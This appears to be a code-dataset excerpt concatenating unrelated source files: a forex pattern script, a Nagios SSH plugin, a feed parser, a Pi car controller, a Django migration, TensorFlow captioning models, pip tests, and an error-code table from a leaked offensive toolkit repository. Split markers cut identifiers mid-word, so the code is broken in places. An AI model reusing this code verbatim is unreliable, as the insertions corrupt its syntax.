print p1, p2, p3, p4, p5, p6, p7, p8, p9, p10
'''
pattern.append(p1)
pattern.append(p2)
pattern.append(p3)
pattern.append(p4)
pattern.append(p5)
pattern.append(p6)
pattern.append(p7)
pattern.append(p8)
pattern.append(p9)
pattern.append(p10)
pattern.append(p11)
pattern.append(p12)
pattern.append(p13)
pattern.append(p14)
pattern.append(p15)
pattern.append(p16)
pattern.append(p17)
pattern.append(p18)
pattern.append(p19)
pattern.append(p20)
pattern.append(p21)
pattern.append(p22)
pattern.append(p23)
pattern.append(p24)
pattern.append(p25)
pattern.append(p26)
pattern.append(p27)
pattern.append(p28)
pattern.append(p29)
pattern.append(p30)
patternAr.append(pattern)
performanceAr.append(futureOutcome)
y+=1
endTime = time.time()
print len(patternAr)
print len(performanceAr)
print 'Pattern storing took:', endTime-startTime
def currentPattern():
mostRecentPoint = avgLine[-1]
cp1 = percentChange(avgLine[-31],avgLine[-30])
cp2 = percentChange(avgLine[-31],avgLine[-29])
cp3 = percentChange(avgLine[-31],avgLine[-28])
cp4 = percentChange(avgLine[-31],avgLine[-27])
cp5 = percentChange(avgLine[-31],avgLine[-26])
cp6 = percentChange(avgLine[-31],avgLine[-25])
cp7 = percentChange(avgLine[-31],avgLine[-24])
cp8 = percentChange(avgLine[-31],avgLine[-23])
cp9 = percentChange(avgLine[-31],avgLine[-22])
cp10= percentChange(avgLine[-31],avgLine[-21])
cp11 = percentChange(avgLine[-31],avgLine[-20])
cp12 = percentChange(avgLine[-31],avgLine[-19])
cp13 = percentChange(avgLine[-31],avgLine[-18])
cp14 = percentChange(avgLine[-31],avgLine[-17])
cp15 = percentChange(avgLine[-31],avgLine[-16])
cp16 = percentChange(avgLine[-31],avgLine[-15])
cp17 = percentChange(avgLine[-31],avgLine[-14])
cp18 = percentChange(avgLine[-31],avgLine[-13])
cp19 = percentChange(avgLine[-31],avgLine[-12])
cp20= percentChange(avgLine[-31],avgLine[-11])
cp21 = percentChange(avgLine[-31],avgLine[-10])
cp22 = percentChange(avgLine[-31],avgLine[-9])
cp23 = percentChange(avgLine[-31],avgLine[-8])
cp24 = percentChange(avgLine[-31],avgLine[-7])
cp25 = percentChange(avgLine[-31],avgLine[-6])
cp26 = percentChange(avgLine[-31],avgLine[-5])
cp27 = percentChange(avgLine[-31],avgLine[-4])
cp28 = percentChange(avgLine[-31],avgLine[-3])
cp29 = percentChange(avgLine[-31],avgLine[-2])
cp30= percentChange(avgLine[-31],avgLine[-1])
patForRec.append(cp1)
patForRec.append(cp2)
patForRec.append(cp3)
patForRec.append(cp4)
patForRec.append(cp5)
patForRec.append(cp6)
patForRec.append(cp7)
patForRec.append(cp8)
patForRec.append(cp9)
patForRec.append(cp10)
patForRec.append(cp11)
patForRec.append(cp12)
patForRec.append(cp13)
patForRec.append(cp14)
patForRec.append(cp15)
patForRec.append(cp16)
patForRec.append(cp17)
patForRec.append(cp18)
patForRec.append(cp19)
patForRec.append(cp20)
patForRec.append(cp21)
patForRec.append(cp22)
patForRec.append(cp23)
patForRec.append(cp24)
p | atForRec.append(cp25)
patForRec.append(cp26)
patForRec.append(cp27)
patForRec.append(cp28)
patForRec.append(cp29)
patForRec.append(cp30)
def graphRawFX():
fig=plt.figure(figsize=(10,7))
ax1 = plt.subplot2grid((40,40), (0,0), rowspan=40, colspan=40)
ax1.plot(date,bid)
ax1.plot(date,ask)
ax1.xaxis.se | t_major_formatter(mdates.DateFormatter('%Y-%m-%d %H:%M:%S'))
plt.grid(True)
for label in ax1.xaxis.get_ticklabels():
label.set_rotation(45)
plt.gca().get_yaxis().get_major_formatter().set_useOffset(False)
ax1_2 = ax1.twinx()
ax1_2.fill_between(date, 0, (ask-bid), facecolor='g',alpha=.3)
plt.subplots_adjust(bottom=.23)
plt.show()
def patternRecognition():
for eachPattern in patternAr:
sim1 = 100.00 - abs(percentChange(eachPattern[0], patForRec[0]))
sim2 = 100.00 - abs(percentChange(eachPattern[1], patForRec[1]))
sim3 = 100.00 - abs(percentChange(eachPattern[2], patForRec[2]))
sim4 = 100.00 - abs(percentChange(eachPattern[3], patForRec[3]))
sim5 = 100.00 - abs(percentChange(eachPattern[ |
crazy-canux/xplugin_nagios | plugin/plugins/check-file-existence/src/check_ssh_file_existence.py | Python | gpl-2.0 | 10,389 | 0.004717 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
#===============================================================================
# Filename : check_ssh_file_existence
# Author : Canux CHENG <canuxcheng@gmail.com>
# Description : Check on remote server if some files are present using SSH.
#-------------------------------------------------------------------------------
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#===============================================================================
__version__ = '0.2.4'
import hashlib
import logging as log
from pprint import pformat
import re
from datetime import datetime, timedelta
from monitoring.nagios.plugin import NagiosPluginSSH
logger = log.getLogger('plugin')
def format_time_from_arg(time_string):
"""
Format a time string from args and return a datetime.
:param time_string: String of the form HH:MM:SS.
:type time_string: str
:return: datetime
"""
time_from_arg = datetime.strptime(time_string, '%H:%M:%S')
current_time = datetime.today()
check_time = time_from_arg.replace(year=current_time.year, month=current_time.month, day=current_time.day)
return check_time
class PluginCheckFileExistence(NagiosPluginSSH):
"""
Plugin customization class.
"""
def initialize(self):
super(PluginCheckFileExistence, self).initialize()
# Use MD5 hash in pickle file name for the case you have multiple service check on the same host that use
# this plugin.
pickle_pattern = '%s_%s_%s' % (self.options.hostname, self.options.regexp.pattern, self.options.directory)
self.picklefile_pattern = hashlib.md5(pickle_pattern).hexdigest()
self.has_check_period = False
self.in_check_period = False
self.flags = {
'DoneForToday': False,
'NotYetPresent': None,
'Files': [],
}
def define_plugin_arguments(self):
super(PluginCheckFileExistence, self).define_plugin_arguments()
parser_file_group = self.parser.add_argument_group('Files', 'Arguments to list and filter files.')
parser_file_group.add_argument('-d',
dest='directory',
default='.',
help='Directory to look files in. Default to the current directory.')
parser_file_group.add_argument('-r',
dest='regexp',
default=re.compile(r'.*'),
type=re.compile,
help='Regexp pattern to filter files. Default to all \'.*\'.')
parser_file_group.add_argument('-n',
dest='count',
type=int,
default=1,
help='Number of file (at least) that must be found to consider it is valid. ' \
'Default to 1 occurence.')
parser_file_group.add_argument('--stime',
dest='stime',
type=format_time_from_arg,
help='Check start time. Check for files starting at the specified time.')
parser_file_group.add_argument('--etime',
dest='etime',
type=format_time_from_arg,
help='Check end time. Do not check for files above this time.')
def verify_plugin_arguments(self):
super(PluginCheckFileExistence, self).verify_plugin_arguments()
# Check time thresholds syntax
if self.options.stime and self.options.etime:
if self.options.stime >= self.options.etime:
self.unknown('Start time cannot be >= end time, check syntax !')
if datetime.today() > self.options.etime:
tomorrow = timedelta(days=1)
self.options.stime += tomorrow
self.options.etime += tomorrow
logger.debug('We must take care of the time period.')
logger.debug('\tStart time: %s' % self.options.stime)
logger.debug('\tEnd time: %s' % self.options.etime)
self.has_check_period = True
if (datetime.today() > self.options.stime) and (datetime.today() < self.options.etime):
logger.debug('We are in check period...')
self.in_check_period = | True
else:
logger.debug('We are not in check period...')
elif (self.options.stime and not self.options.etime) or (not self.options.stime and self.options.etime):
self.unknown('Missing start/end time information, check syntax !')
de | f search_files(self, files):
found = []
regexp = self.options.regexp
for file in files:
if regexp.search(file):
logger.debug('\tFound file \'%s\'.' % file)
found.append(file)
return found
plugin = PluginCheckFileExistence(description='Check on remote server if some files are present using SSH.',
version=__version__)
# Look for files on the remote server.
files = plugin.ssh.list_files(plugin.options.directory)
logger.debug('Retrieve files list:')
logger.debug(pformat(files))
# Search files using the regexp
found_files = plugin.search_files(files)
# Should we check if plugin must be executed ?
status = None
message = ''
if plugin.has_check_period:
# Check period defined
# Load previous state
try:
flags = plugin.load_data()
except IOError:
flags = plugin.flags
if plugin.in_check_period:
if flags['DoneForToday']:
status = plugin.ok
message = '%d files have already been checked today.\n'\
'The following files have been found:\n'\
'%s' % (len(flags['Files']), '\n'.join(flags['Files']))
else:
if found_files:
if len(found_files) >= plugin.options.count:
flags['Files'] = found_files
flags['DoneForToday'] = True
flags['NotYetPresent'] = None
status = plugin.ok
message = '%d files with regexp \"%s\" have been found in \"%s\".\n'\
'The following files have been found:\n'\
'%s' % (len(found_files),
plugin.options.regexp.pattern,
plugin.options.directory,
'\n'.join(found_files))
else:
status = plugin.critical
message = 'Only %d files with regexp \"%s\" have been found in \"%s\".'\
'Should be at least %d.\n' % (len(found_files),
plugin.options.regexp.pattern,
plugin.options.directory,
plugin.options.count)
else:
flags['NotYetPresent'] = True
status = plugin.ok
message = 'Files with regexp \"%s\" are not yet present in \"%s\".'\
'Verify in next check...' % |
jmdevince/cifpy3 | lib/cif/feeder/parsers/csv.py | Python | gpl-3.0 | 2,069 | 0.0029 | import csv
from ..parser import Parser
__author__ = 'James DeVincentis <james.d@hexhost.net>'
class Csv(Parser):
def __init__(self, **kwargs):
self.csv = csv.reader(self.file)
def parsefile(self, filehandle, max_objects=1000):
"""Parse file provided by `filehandle`. Return `max_objects` at a time. This is repetitively called
:param filehandle: Open text mode filehandle object pointing to the file to be parsed.
:param int max_objects: Number of objects to return
:return: List of parsed observables
:rtype: list
"""
self.loadjournal()
observables = []
if self.total_objects == 0 and "start" in self.parsing_details and self.parsing_details["start"] > 1:
for x in range(1, self.parsing_details["start"]):
try:
next(self.csv)
self.total_objects += 1
except StopIteration:
self.parsing = False
return observables
objects = 0
while objects < max_objects:
try:
line = next(self.csv)
except StopIteration:
self.parsing = False
break
if len(line) != self.valuecount:
if line[0].startswith('#') or line[0].startswith(';'):
continue
self.logging.debug("No Match - feed: '{3}'; contents: '{0}'; match-count: {2}; values: {1}".format(
line, len(self.parsing_details["values"]), len(line), self.parsing_details['feed_name'])
)
continue
observable = self.create_observable_from_meta_if_not_in_journal(line)
if observable is not None:
observa | bles.append(observable)
objects += 1
self.total_objects += 1
if self.ending an | d self.total_objects >= self.end:
self.parsing = False
break
self.writejournal()
return observables
|
lukaszo/picar_worhshop | picar/car.py | Python | apache-2.0 | 3,163 | 0.001265 | # -*- coding: UTF-8 -*-
import pigpio
class Car(object):
PINS = ['left_pin', 'right_pin', 'forward_pin', 'backward_pin',
'enable_moving', 'enable_turning']
def __init__(self, left_pin, right_pin, forward_pin, backward_pin,
enable_moving, enable_turning, start_power=65):
self._left_pin = left_pin
self._right_pin = right_pin
self._forward_pin = forward_pin
self._backward_pin = backward_pin
self._enable_moving = enable_moving
self._enable_turning = enable_turning
self._setup_gpio()
self._moving_pwm_started = False
self._power = start_power
def _setup_gpio(self):
self._pi = pigpio.pi()
self._pi.set_mode(self._left_pin, pigpio.OUTPUT)
self._pi.set_mode(self._right_pin, pigpio.OUTPUT)
self._pi.set_mode(self._forward_pin, pigpio.OUTPUT)
self._pi.set_mode(self._backward_pin, pigpio.OUTPUT)
self._pi.set_mode(self._enable_moving, pigpio.OUTPUT)
self._pi.set_mode(self._enable_turning, pigpio.OUTPUT)
self._pi.set_PWM_range(self._enable_moving, 100)
self._pi.set_PWM_frequency(self._enable_moving, 100) # channel, frequency
def turn_left(self):
self._pi.write(self._enable_turning, True)
self._pi.write(self._right_pin, False)
self._pi.write(self._left_pin, True)
def turn_right(self):
self._pi.write(self._enable_turning, True)
self._pi.write(self._left_pin, False)
self._pi.write(self._right_pin, True)
def straight(self):
self._pi.write(self._left_pin, False)
self._pi.write(self._right_pin, False)
self._pi.write(self._enable_turning, False)
def move_forward(self):
self._pi.write(self._backward_pin, False)
self._pi.write(self._forward_pin, True)
self._start_moving_pwm()
def move_backw | ard(self):
self._pi.write(self._forward_pin, False)
self._pi.write(self._backward_pin, True)
self._start_moving_pwm()
def faster(self, change_value=15):
if self._power + change_value > 100:
self._power = 100
else:
| self._power += change_value
self._change_power()
def slower(self, change_value=15):
if self._power - change_value < 30:
self._power = 30
else:
self._power -= change_value
self._change_power()
def stop_moving(self):
self._pi.set_PWM_dutycycle(self._enable_turning, 0)
self._pi.write(self._backward_pin, False)
self._pi.write(self._forward_pin, False)
self._moving_pwm_started = False
def stop(self):
self.stop_moving()
self._pi.write(self._left_pin, False)
self._pi.write(self._right_pin, False)
self._pi.write(self._enable_turning, False)
def _start_moving_pwm(self):
if self._moving_pwm_started:
return
self._pi.set_PWM_dutycycle(self._enable_moving, self._power)
self._moving_pwm_started = True
def _change_power(self):
self._pi.set_PWM_dutycycle(self._enable_moving, self._power)
|
obulpathi/poppy | poppy/transport/pecan/models/request/provider_details.py | Python | apache-2.0 | 1,024 | 0 | # Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance | with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitat | ions under the License.
from poppy.model.helpers import provider_details
def load_from_json(json_data):
access_urls = json_data.get("access_urls")
error_info = json_data.get("error_info", )
provider_service_id = json_data.get("id")
status = json_data.get("status")
return provider_details.ProviderDetail(
provider_service_id=provider_service_id,
access_urls=access_urls,
status=status,
error_info=error_info)
|
BartDeCaluwe/925r | ninetofiver/migrations/0072_auto_20180502_0834.py | Python | gpl-3.0 | 2,929 | 0.002048 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-05-02 08:34
from __future__ import unicode_literals
import dirtyfields.dirtyfields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('ninetofiver', '0071_apikey_name'),
]
operations = [
migrations.CreateModel(
name='WhereaboutDate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('starts_at', models.DateTimeField()),
('ends_at', models.DateTimeField()),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.m | odels.deletion.CASCADE, related_name='polymorphic_ninetofiver.whereaboutdate_set+', to='contenttypes.ContentType')),
('timesheet', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='ninetofiver.Timesheet')),
],
options={
'ordering': ['id'],
| 'abstract': False,
'base_manager_name': 'base_objects',
},
bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),
managers=[
('objects', django.db.models.manager.Manager()),
('base_objects', django.db.models.manager.Manager()),
],
),
migrations.RemoveField(
model_name='whereabout',
name='day',
),
migrations.RemoveField(
model_name='whereabout',
name='timesheet',
),
migrations.AddField(
model_name='whereabout',
name='description',
field=models.TextField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='whereabout',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AlterField(
model_name='whereabout',
name='location',
field=models.CharField(choices=[('home', 'Home'), ('office', 'Office'), ('out_of_office', 'Out of office'), ('other', 'Other')], max_length=32),
),
migrations.AddField(
model_name='whereaboutdate',
name='whereabout',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ninetofiver.Whereabout'),
),
]
|
kubeflow/kfp-tekton-backend | samples/contrib/image-captioning-gcp/src/models.py | Python | apache-2.0 | 3,943 | 0.001014 | # Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the models used in the image captioning pipeline"""
import tensorflow as tf
class BahdanauAttention(tf.keras.Model):
def __init__(self, units):
super(BahdanauAttention, self).__init__()
self.W1 = tf.keras.layers.Dense(units)
self.W2 = tf.keras.layers.Dense(units)
self.V = tf.keras.layers.Dense(1)
def call(self, features, hidden):
# features(CNN_encoder output) shape == (batch_size, 64, embedding_dim)
# hidden shape == (batch_size, hidden_size)
# hidden_with_time_axis shape == (batch_size, 1, hidden_size)
hidden_with_time_axis = tf.expand_dims(hidden, 1)
# score shape == (batch_size, 64, hidden_size)
score = tf.nn.tanh(self.W1(features) + self.W2(hidden_with_time_axis))
# attention_weights shape == (batch_size, 64, 1)
# you get 1 at the last axis because you are applying score to self.V
attention_weights = tf.nn.softmax(self.V(score), axis=1)
# context_vector shape after sum == (batch_size, hidden_size)
context_vector = attention_weights * features
context_vector = tf.reduce_sum(context_vector, axis=1)
return context_vector, attention_weights
# CNN Encoder model
class CNN_Encoder(tf.keras.Model):
# Since you have already extracted the features and dumped it using pickle
# This encoder passes those features through a Fully connected layer
def __init__(self, embedding_dim):
super(CNN_Encoder, self).__init__()
# shape after fc == (batch_size, 64, embedding_dim)
self.fc = tf.keras.layers.Dense(embedding_dim)
def call(self, x):
x = self.fc(x)
x = tf.nn.relu(x)
return x
# RNN Decoder model
class RNN_Decoder(tf.keras.Model):
def __init__(self, embedding_dim, units, vocab_size):
super(RNN_Decoder, self).__init__()
self.units = units
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(self.units,
return_sequences=True,
return_state=True,
recurrent_initializer='glorot_uniform')
self.fc1 = tf.keras.layers.Dense(self.units)
self.fc2 = tf.keras.layers.Dense(vocab_size)
self.attention = BahdanauAttention(self.units)
def call(self, x, features, hidden):
# defining attention as a separate model
context_vector, attention_weights = self.attention(features, hidden)
# x shape after passing through embedding == (batch_size, 1, embedding_dim)
x = self.embedding(x)
# x shape after concatenation == (batch_size, 1, embedding_dim + hidden_size)
x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)
# passing the concatenated vector to the GRU
output, state = self.gru(x)
# shape == (batch_size, max_length, hidden_size)
x = self.fc1(output)
| # x shape == (batch_size * max_length, hidden_size)
x = tf.reshape(x, (-1, x.shape[2]))
# output shape == (batch | _size * max_length, vocab)
x = self.fc2(x)
return x, state, attention_weights
def reset_state(self, batch_size):
return tf.zeros((batch_size, self.units))
|
zvezdan/pip | tests/functional/test_install_user.py | Python | mit | 11,608 | 0 | """
tests specific to "pip install --user"
"""
import os
import textwrap
from os.path import curdir, isdir, isfile
import pytest
from pip._internal.compat import cache_from_source, uses_pycache
from tests.lib import pyversion
from tests.lib.local_repos import local_checkout
def _patch_dist_in_site_packages(script):
sitecustomize_path = script.lib_path.join("sitecustomize.py")
sitecustomize_path.write(textwrap.dedent("""
def dist_in_site_packages(dist):
return False
from pip._internal.req import req_install
req_install.dist_in_site_packages = dist_in_site_packages
"""))
# Caught py32 with an outdated __pycache__ file after a sitecustomize
# update (after python should have updated it) so will delete the cache
# file to be sure
# See: https://github.com/pypa/pip/pull/893#issuecomment-16426701
if uses_pycache:
cache_path = cache_from_source(sitecustomize_path)
if os.path.isfile(cache_path):
os.remove(cache_path)
class Tests_UserSite:
@pytest.mark.network
def test_reset_env_system_site_packages_usersite(self, script, virtualenv):
"""
reset_env(system_site_packages=True) produces env where a --user
install can be found using pkg_resources
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.2')
result = script.run(
'python', '-c',
"import pkg_resources; print(pkg_resources.get_distribution"
"('initools').project_name)",
)
project_name = result.stdout.strip()
assert 'INITools' == project_name, project_name
@pytest.mark.network
def test_install_subversion_usersite_editable_with_distribute(
self, script, virtualenv, tmpdir):
"""
Test installing current directory ('.') into usersite after installing
distribute
"""
virtualenv.system_site_packages = True
result = script.pip(
'install', '--user', '-e',
'%s#egg=initools' %
local_checkout(
'svn+http://svn.colorstudy.com/INITools/trunk',
tmpdir.join("cache"),
)
)
result.assert_installed('INITools', use_user_site=True)
@pytest.mark.network
def test_install_from_current_directory_into_usersite(
self, script, virtualenv, data, common_wheels):
"""
Test installing current directory ('.') into usersite
"""
virtualenv.system_site_packages = True
script.pip("install", "wheel", '--no-index', '-f', common_wheels)
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '-vvv', '--user', curdir,
cwd=run_from,
expect_error=False,
)
fspkg_folder = script.user_site / 'fspkg'
assert fspkg_folder in result.files_created, result.stdout
dist_info_folder = (
script.user_site / 'FSPkg-0.1.dev0.dist-info'
)
assert dist_info_folder in result.files_created
def test_install_user_venv_nositepkgs_fails(self, script, data):
"""
user install in virtualenv (with no system packages) fails with message
"""
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '--user', curdir,
cwd=run_from,
expect_error=True,
)
assert (
"Can not perform a '--user' install. User site-packages are not "
"visible in this virtualenv." in result.stderr
)
@pytest.mark.network
def test_install_user_conflict_in_usersite(self, script, virtualenv):
"""
Test user install with conflict in usersite updates usersite.
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.3', '--no-binary=:all:')
result2 = script.pip(
'install', '--user', 'INITools==0.1', '--no-binary=:all:')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_v3_file = (
# file only in 0.3
script.base_path / script.user_site / 'initools' /
'configparser.py'
)
assert egg_info_folder in result2.files_created, str(result2)
assert not isfile(initools_v3_file), initools_v3_file
@pytest.mark.network
def test_install_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2', '--no-binary=:all:')
result2 = script.pip(
'install', '--user', 'INITools==0.1', '--no-binary=:all:')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder)
assert isdir(initools_folder)
@pytest.mark.network
def test_upgrade_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install/upgrade with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over th | e virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2', '--no-binary=:all:')
result2 = script.pip(
'install', '--user', '--upgrade', 'INITools', '--no-bin | ary=:all:')
# usersite has 0.3.1
egg_info_folder = (
script.user_site / 'INITools-0.3.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryhive/errors.py | Python | unlicense | 1,689 | 0.009473 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: errors.py
import mcl.status
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_INVALID_HIVE = mcl.status.framework.ERR_START + 1
ERR_INVALID_ACTION = mcl.status.framework.ERR_START + 2
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 3
ERR_OPEN_FAILED = mcl.status.framework.ERR_START + 4
ERR_API_UNAVAILABLE = mcl.status.framework.ERR_START + 5
ERR_LOAD_FAILED = mcl.status.framework.ERR_START + 6
ERR_UNLOAD_FAILED = mcl.status.framework.ERR_START + 7
ERR_SAVE_FAILED = mcl.status.framework.ERR_START + 8
ERR_RESTORE_FAILED = mcl.status.framework.ERR_START + 9
ERR_UNLOAD_LIST_LOCKED = mcl.status.framework.ERR_START + 10
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 11
ERR_SEND_FAILED = mcl.status.framework.ERR_START + 12
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
ERR_INVALID_HIVE: 'Invalid hive',
ERR_INVALID_ACTION: 'Invalid a | ction',
ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_OPEN_FAILED: 'Failed to open registry key',
ERR_API_UNAVAILABLE: 'Unable to acc | ess the registry API',
ERR_LOAD_FAILED: 'Failed to load hive',
ERR_UNLOAD_FAILED: 'Failed to unload hive',
ERR_SAVE_FAILED: 'Failed to save hive to file',
ERR_RESTORE_FAILED: 'Failed to restore key from file',
ERR_UNLOAD_LIST_LOCKED: 'Unable to add hive to list of hives to unload. Unload list is currently locked',
ERR_GET_FULL_PATH_FAILED: 'Failed to get full path to hive',
ERR_SEND_FAILED: 'Failed to send marshalled message'
} |
OCA/server-tools | module_prototyper/tests/test_prototype_module_export.py | Python | agpl-3.0 | 2,979 | 0.000336 | # #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import io
import zipfile
from odoo.tests import common
class TestPrototypeModuleExport(common.TransactionCase):
def setUp(self):
super(TestPrototypeModuleExport, self).setUp()
self.main_model = self.env["module_prototyper.module.export"]
self.prototype_model = self.env["module_prototyper"]
self.module_category_model = self.env["ir.module.category"]
self.prototype = self.prototype_model.create(
{
"name": "t_name",
"category_id": self.module_category_model.browse(1).id,
"human_name": "t_human_name",
"summary": "t_summary",
"description": "t_description",
"author": "t_author",
"maintainer": "t_maintainer",
"website": "t_website",
}
)
self.exporter = self.main_model.create({"name": "t_name"})
def test_action_export_assert_for_wrong_active_model(self):
"""Test if the assertion raises."""
exporter = self.main_model.with_context(active_model="t_active_model").create(
{}
)
self.assertRaises(AssertionError, exporter.action_export)
def test_action_export_update_wizard(self):
"""Test if the wizard is updated during the process."""
exporter = self.main_model.with_context(
active_model=self.prototype_model._name,
active_id=self.prototype.id,
).create({})
exporter.action_export()
self.assertEqual(exporter.state, "get")
| self.assertEqual(exporter.name, "{}.zip".format(self.prototype.name))
def test_zip_files_returns_tuple(self):
"""Test the method return of the method that generate the zip file."""
ret = self.main_model.zip_files(self.exporter, [self.prototype])
| self.assertIsInstance(ret, tuple)
self.assertIsInstance(ret.zip_file, zipfile.ZipFile)
self.assertIsInstance(ret.BytesIO, io.BytesIO)
|
patricksnape/imageio | tests/test_avbin.py | Python | bsd-2-clause | 5,018 | 0.007373 | """ Test imageio avbin functionality.
"""
from pytest import raises
from imageio.testing import run_tests_if_main, get_test_dir, need_internet
import imageio
from imageio import core
from imageio.core import get_remote_file
# if IS_PYPY:
# skip('AVBIn not supported on pypy')
test_dir = get_test_dir()
mean = lambda x: x.sum() / x.size # pypy-compat mean
def test_select():
fname1 = get_remote_file('images/cockatoo.mp4', test_dir)
F = imageio.formats['avbin']
assert F.name == 'AVBIN'
assert F.can_read(core.Request(fname1, 'rI'))
assert not F.can_write(core.Request(fname1, 'wI'))
assert not F.can_read(core.Request(fname1, 'ri'))
assert not F.can_read(core.Request(fname1, 'rv'))
# ffmpeg is default
#formats = imageio.formats
#assert formats['.mp4'] is F
#assert formats.search_write_format(core.Request(fname1, 'wI')) is F
#assert formats.search_read_format(core.Request(fname1, 'rI')) is F
def test_read():
need_internet()
R = imageio.read(get_remote_file('images/cockatoo.mp4'), 'avbin')
assert R.format is imageio.formats['avbin']
fname = get_remote_file('images/cockatoo.mp4', force_download='2014-11-05')
reader = imageio.read(fname, 'avbin')
assert reader.get_length() == 280
assert 'fps' in reader.get_meta_data()
raises(Exception, imageio.save, '~/foo.mp4', 'abin')
#assert not reader.format.can_write(core.Request('test.mp4', 'wI'))
for i in range(10):
im = reader.get_next_data()
assert im.shape == (720, 1280, 3)
# todo: fix this
